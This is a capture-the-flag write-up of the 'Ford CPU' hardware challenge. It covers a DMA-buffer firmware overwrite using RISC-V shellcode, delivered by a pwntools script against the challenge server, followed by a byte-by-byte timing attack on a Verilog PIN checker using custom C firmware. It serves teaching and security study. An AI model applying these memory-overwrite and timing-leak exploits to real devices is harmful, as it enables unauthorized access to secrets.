[0x00000000]> / chCTF
Searching 5 bytes in [0x0-0x10650]
hits: 1
0x00009340 hit0_0 .lid commandchCTF{Pr0P3R_r353771n.
[0x00000000]> s hit0_0
[0x00009340]> ps
chCTF{Pr0P3R_r353771n9_15_V3rY_H4RD}

We also looked for our dummy text that we entered into the buffer (bruh) and found that our cmd buffer is at a different address on the server’s firmware than the one we were provided; that makes sense, since the real flag is much longer than the fake flag in the source code for the firmware we were given. This also explains why our other exploit attempt at jumping into cmd failed. But, now we have the exact offset so we can reliably use cmd for stage 2 of this challenge.

Stage 2: Timing attack

The next challenge involved getting a flag out of a hardware device that is PIN-protected. Looking at its source in Verilog reveals the world’s most obvious timing attack:

// PIN checking
always @(posedge clk) begin
    if (device_status) begin
        delay <= delay + 1;
        if (delay == 8'hff) begin
            if (pin_bytes[ctr] == correct_pin[ctr]) begin
                ctr <= ctr + 1;
                if(ctr == 4'hf) begin
                    device_status <= 0;
                    pin_status <= 1;
                end
            end else begin
                device_status <= 0;
                pin_status <= 0;
            end
        end
    end
end

We see that it artificially waits 256 clock cycles between each byte-by-byte compare of the entered PIN against the correct PIN. Also, the device’s status is immediately reset as soon as one of the bytes is wrong. The time that device_status stays high therefore tells us how many leading bytes of our guess are correct, so we can brute-force the PIN one byte at a time.
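To see why this leaks the PIN so quickly, here is a host-side simulation of the idea. It is only a sketch: the secret below is made up, the cycle count is idealized to exactly 256 per compared byte, and the real attack has to measure the busy time from code running on the MCU.

```python
# Hypothetical secret, only so the simulation has something to recover.
SECRET_PIN = bytes.fromhex("00112233445566778899aabbccddeeff")


def check_cycles(guess: bytes, correct: bytes):
    """Toy model of the checker: return (cycles spent busy, pin accepted)."""
    cycles = 0
    for ctr in range(16):
        cycles += 256                    # delay counter runs up to 0xff before each compare
        if guess[ctr] != correct[ctr]:
            return cycles, False         # early exit on the first wrong byte
    return cycles, True


def recover_pin(oracle) -> bytes:
    """Recover the PIN byte by byte, keeping the candidate with the longest busy time."""
    known = bytearray(16)
    for pos in range(16):
        best, best_cycles = 0, -1
        for candidate in range(256):
            known[pos] = candidate
            cycles, accepted = oracle(bytes(known))
            if accepted:
                return bytes(known)
            if cycles > best_cycles:
                best, best_cycles = candidate, cycles
        known[pos] = best                # a correct byte buys at least 256 extra cycles
    return bytes(known)


recovered = recover_pin(lambda guess: check_cycles(guess, SECRET_PIN))
```

The search needs at most 16 × 256 = 4096 guesses, compared with 256^16 for a constant-time check.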

Since the timing attack is on the order of a few hundred clock cycles, it’s clear we need to execute the attack on the MCU itself. I don’t like coding in assembly, particularly with an architecture I’m not very familiar with, so I decided to attempt to load our own custom firmware on the MCU using the attack from the last stage. The firmware itself is just the firmware source that we were given, except I removed newlib (it’s big and we won’t be needing it) and modified its startup. But first, we still need to load this firmware into RAM.

Firmware Loading

This is where knowing the address of cmd comes in handy. Since the MCU will still be executing code while we are loading our new firmware (starting at address 0!), we need it to be executing code at a region in memory far away from the firmware so that we don’t accidentally start running our new firmware before it’s fully loaded. So, we can place a spinloop in our buffer (which is very high up in memory, since it’s a global variable in the .bss section), and safely overwrite the firmware from under it. But, since we’re in this spinloop, we no longer have a way of resetting the MCU; we’ll need another way of redirecting execution back into the firmware that does not require a reset. Fortunately, we can generate an interrupt from our input by sending 4 newlines. The interrupt will cause a jump to the interrupt handler at address 0x10, which is in our new firmware. Thus, we can start execution of our new firmware by triggering irq_rx_done!

There’s just one catch to this plan—we no longer have a working interrupt handler in our new firmware because we use it to jump to _start. To remedy this, I placed another jump to the normal interrupt handler after the jump to _start:

/* irq handler */
.global _irq_handler
.org 0x00000010
_irq_handler:
    j _start
    j _irq

…followed by the code of main() immediately nop’ing out the j _start:

void main() {
    *(uint16_t*)_irq_handler = 0x0001; // nop
    // ...
}

This also requires one small adjustment to our shellcode—upon reset, the PicoRV32 masks all interrupts, which means all interrupts will be ignored. Thus, our shellcode needs to also unmask them before spinlooping.

Now we just need to script the actual loading process. The Makefile from the firmware build outputs a .bin file which contains the raw memory of our newly-built firmware, so we can use that in our script:

#!/usr/bin/env python3
from pwn import *
import subprocess
import shlex
import math
from pwnlib.util.packing import pack

if args.REMOTE:
    p = remote('ford-cpu.chujowyc.tf', 4001)
    with log.progress('Doing POW'):
        p.recvuntil('output of:\n')
        hashcash_cmd = p.recvline().decode()
        hashcash = subprocess.run(shlex.split(hashcash_cmd), stdout=subprocess.PIPE)
        hashcash_stamp = hashcash.stdout.decode().replace('hashcash stamp: ', '').strip()
        p.sendlineafter('hashcash stamp:', hashcash_stamp)
    CMD_ADDR = 0xe9ac
else:
    p = process('./Vtop')
    CMD_ADDR = 0xe994


# RISC V utils

def int2bitlist(number, size=32):
    result_bytes = pack(number, size, endianness='little')
    result = [bool(result_bytes[i // 8] & (1 << (i % 8))) for i in range(size)]
    return result


def bitlist2int(bits):
    return sum(2 ** i for i, v in enumerate(bits) if v)


def generate_jump(addr, target):
    """
    Assemble `j` to target (relative)
    """
    offs = target - addr
    offs_bits = int2bitlist(offs, size=21)
    opcode = int2bitlist(0x6f, size=32)  # jal x0
    opcode[12:32] = [
        offs_bits[i]
        for i in [12, 13, 14, 15, 16, 17, 18, 19, 11, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 20]
    ]
    return bitlist2int(opcode)


# MCU interaction utils

def d_send(s: bytes, interrupt=False):
    s_len = math.ceil(len(s) / 4) * 4
    s = s.ljust(s_len, b'\0')
    p.send(s)
    if interrupt:
        p.send(b'\n'*4)

def fw_send(s: bytes):
    d_send(s, interrupt=True)

def fw_goto_prompt():
    with log.progress('Waiting for prompt'):
        p.recvuntil(b'xD xD XD Can you PWN my DMA controller? xD xD XD\n')

def fw_enter_flag_cmp():
    with log.progress('Entering flag compare mode'):
        fw_send(b'ack\n')
        p.recvuntil(b'OK\n')
        fw_send(b'cmp\n')
        p.recvuntil(b'Now you have 3 tries to guess the flag\n')

# jump to cmd
JUMP_TO_CMD_FROM_0 = p32(generate_jump(0, CMD_ADDR))

SHELLCODE = (
    p32(0x0600600b) +  # maskirq zero,zero: clear the IRQ mask (enable all interrupts)
    p32(0x2001    )    # c.jal 0: jump to itself (infinite loop)
)

NEW_FW = bytes()
with open('./new-fw.bin', 'rb') as fd:
    NEW_FW = fd.read()

fw_goto_prompt()
fw_enter_flag_cmp()
with log.progress('Resetting'):
    # Use up all three tries with wrong guesses
    for _ in range(2):
        fw_send(b'bruh')
        p.recvuntil(b'INVALID FLAG\n')
    fw_send(b'bruh')

p.send(JUMP_TO_CMD_FROM_0)

fw_goto_prompt()
fw_enter_flag_cmp()
with log.progress('Resetting'):
    # Same three tries, but this time the input carries the shellcode
    for _ in range(2):
        fw_send(SHELLCODE)
        p.recvuntil(b'INVALID FLAG\n')
    fw_send(SHELLCODE)
    p.recvuntil(b'resetting...\n')

with log.progress('Loading new FW'):
    d_send(NEW_FW, interrupt=True)

p.interactive()

As you might be able to see, a lot of it was copied from the previous stage, with the addition of a utility to create jump instructions (which took pepsipu and me the better part of an hour to get right).
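The J-type immediate is what makes this fiddly: the offset bits are stored in the order imm[20], imm[10:1], imm[11], imm[19:12]. The same encoding can also be written with plain shifts and masks, together with a decoder to double-check the result. This is a sketch rather than the code we used; `encode_jal` and `decode_jal` are hypothetical names.

```python
def encode_jal(offset, rd=0):
    """Encode `jal rd, offset` (rd=0 gives a plain `j`). Offset is in bytes."""
    if offset % 2 or not -(1 << 20) <= offset < (1 << 20):
        raise ValueError('offset must be even and fit in 21 signed bits')
    imm = offset & 0x1FFFFF  # two's complement, 21 bits
    return (
        ((imm >> 20) & 0x1) << 31      # imm[20]
        | ((imm >> 1) & 0x3FF) << 21   # imm[10:1]
        | ((imm >> 11) & 0x1) << 20    # imm[11]
        | ((imm >> 12) & 0xFF) << 12   # imm[19:12]
        | rd << 7
        | 0x6F                         # JAL opcode
    )


def decode_jal(inst):
    """Recover the signed byte offset from an encoded JAL instruction."""
    imm = (
        ((inst >> 31) & 0x1) << 20
        | ((inst >> 21) & 0x3FF) << 1
        | ((inst >> 20) & 0x1) << 11
        | ((inst >> 12) & 0xFF) << 12
    )
    if imm & (1 << 20):  # sign-extend from bit 20
        imm -= 1 << 21
    return imm


# Round-trip the jump used by the loader (from address 0 to the local CMD_ADDR).
jump = encode_jal(0xe994 - 0)
```

Decoding the generated word and comparing it with the intended offset is a cheap way to catch a swapped bit range before sending anything to the target.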

With firmware loading out of the way, we have a completely normal firmware where we can do whatever we want!

So, the next step is of course to implement the timing attack:

#include "soc.h"
#include "irq.h"

void uart_write(const char* ptr, int len) {
    for (int i = 0; i < len; i++) {
        REG32(UART_REG_DOUT) = *ptr++;
    }
}

char fd_flag[16] = {};

void read_flag() {
    for (uint32_t i = 0; i < sizeof(fd_flag); i += 4) {
        *(uint32_t*)(fd_flag + i) = REG32(FLAG_DEV_FLAG_START + i);
    }
}

char fd_pin[16] = {0};

void write_pin() {
    for (uint32_t i = 0; i < sizeof(fd_pin); i += 4) {
        REG32(FLAG_DEV_PIN + i) = *(uint32_t*)(fd_pin + i);
    }
}

int time_pin() {
    write_pin();
    int counter = 0;
    /* BEGIN CRITICAL SECTION */
    REG32(FLAG_DEV_CHECK_START) = 1;
    for (; REG32(FLAG_DEV_DEVICE_STATUS); ++counter);
    /* END CRITICAL SECTION */
    return counter;
}

void do_attack() {
    int prev_pin_byte = 0, curr_pin_byte = 0;
    int succeeded = 0;
    while (!succeeded && curr_pin_byte < sizeof(fd_pin)) {
        curr_pin_byte = ((time_pin() + 1) / 6) - 1;
        if (curr_pin_byte > prev_pin_byte) {
            // One more byte matched; move on to the next one
            prev_pin_byte = curr_pin_byte;
        } else {
            if (curr_pin_byte < prev_pin_byte) {
                uart_write("REGRESSION\n", 11);
            }
            // The current byte is wrong
            ++fd_pin[curr_pin_byte];
        }
        succeeded = REG32(FLAG_DEV_PIN_STATUS);
    }
}

const char STARTUP_MESSAGE[] = "Firmware booted\n";

void main() {
    *(uint16_t*)_irq_handler = 0x0001; // nop
    uart_write(STARTUP_MESSAGE, sizeof(STARTUP_MESSAGE) - 1);
    do_attack();
    read_flag();
    uart_write(fd_flag, 16);
    uart_write("\n", 1);
    for (;;);
}

// ...and some more ISR stuff that wasn't used
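
To see the idea without hardware in the loop, here is a small Python model of the same attack. Everything about the device is an assumption for illustration: `mock_check` stands in for the FlagDevice with an early-exit comparison and a made-up cost per byte, and the PIN is invented. Unlike the C code above, it picks the slowest candidate for each position instead of dividing by a known per-byte cost.

```python
SECRET_PIN = b'0123456789abcdef'  # invented PIN, not the real one
CYCLES_PER_BYTE = 6               # made-up cost of comparing one byte


def mock_check(guess):
    """Early-exit comparison: returns (cycles spent, whether the PIN matched)."""
    cycles = 0
    for g, s in zip(guess, SECRET_PIN):
        cycles += CYCLES_PER_BYTE
        if g != s:
            return cycles, False
    return cycles, True


def recover_pin(check, length):
    """Recover the PIN one byte at a time from the comparison time."""
    guess = bytearray(length)
    for pos in range(length):
        best_cycles, best_byte = -1, 0
        for candidate in range(256):
            guess[pos] = candidate
            cycles, ok = check(bytes(guess))
            if ok:
                return bytes(guess)
            # A correct byte lets the comparison run further before failing
            if cycles > best_cycles:
                best_cycles, best_byte = cycles, candidate
        guess[pos] = best_byte
    raise RuntimeError('PIN not recovered')


recovered = recover_pin(mock_check, len(SECRET_PIN))
```

This needs at most 256 checks per byte instead of 256^16 guesses overall, which is why leaking the position of the first mismatch is so damaging.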

When writing the code that interfaces with the FlagDevice, I made sure to only use aligned 32-bit memory accesses; this shouldn’t be needed for the reads, but it is necessary for the writes. To perform writes smaller than one word, the AXI bus uses a strobe (WSTRB) to specify which bytes of the 32-bit-wide bus are valid; however, the FlagDevice ignores the WSTRB lines, so it only works correctly with full 32-bit writes.
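A toy model of the difference, assuming a single 32-bit register and a byte store that asserts only one strobe bit. The class and function names are hypothetical, the data on the unused byte lanes is assumed to be zero (a real core may drive something else), and this is not a translation of the Verilog.

```python
class StrobeAwareRegister:
    """Updates only the byte lanes selected by the write strobe."""

    def __init__(self, value=0):
        self.value = value

    def write(self, wdata, wstrb):
        for lane in range(4):
            if wstrb & (1 << lane):
                mask = 0xFF << (8 * lane)
                self.value = (self.value & ~mask) | (wdata & mask)


class StrobeIgnoringRegister:
    """Overwrites the whole word on every write, whatever the strobe says."""

    def __init__(self, value=0):
        self.value = value

    def write(self, wdata, wstrb):
        self.value = wdata & 0xFFFFFFFF


def store_byte(reg, byte_offset, byte):
    """Model a byte store: data on one lane, one strobe bit set."""
    reg.write(byte << (8 * byte_offset), 1 << byte_offset)


good = StrobeAwareRegister(0x11223344)
bad = StrobeIgnoringRegister(0x11223344)
store_byte(good, 1, 0xAA)  # only byte 1 changes
store_byte(bad, 1, 0xAA)   # the other three bytes are clobbered
```

In this model a byte-wise PIN write would leave only the last byte of each word intact on the strobe-ignoring register, which is why the firmware writes whole words.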

Our new firmware can be run either through the normal load process of the simulator (copying the built ram.hex file to firmware.hex in the working directory of Vtop) or through our loader script. Running it in the simulator directly saves us from waiting for the loader while debugging.

Running this against remote gave us the flag.

❯ ./fw-replace.py REMOTE
[+] Opening connection to ford-cpu.chujowyc.tf on port 4001: Done
[+] Doing POW: Done
[+] Waiting for prompt: Done
[+] Entering flag compare mode: Done
[+] Resetting: Done
[+] Waiting for prompt: Done
[+] Entering flag compare mode: Done
[+] Resetting: Done
[+] Loading new FW: Done
[*] Switching to interactive mode
Firmware booted
71m1N9_4774ck_xD

Closing thoughts#

This was the first time any of us at redpwn had done anything related to hardware and Verilog, and it was a fantastic learning experience for everyone involved. This challenge was very well set up, with no guesswork required: the description got right to the point of where we should be looking for bugs. For a challenge with this many components, that is necessary so that players don’t waste time looking at things that ultimately aren’t relevant. After some of the other CTFs we’ve played recently, it’s a nice change of pace to know exactly what you’re looking for in a challenge with some very clear goals, where the only barrier is your own knowledge. We all learned a great deal from this challenge; huge kudos to Gorbak for putting together something unique and truly educational, yet still approachable to CTFers.

Ethan Wu

Chujowy CTF - Ford CPU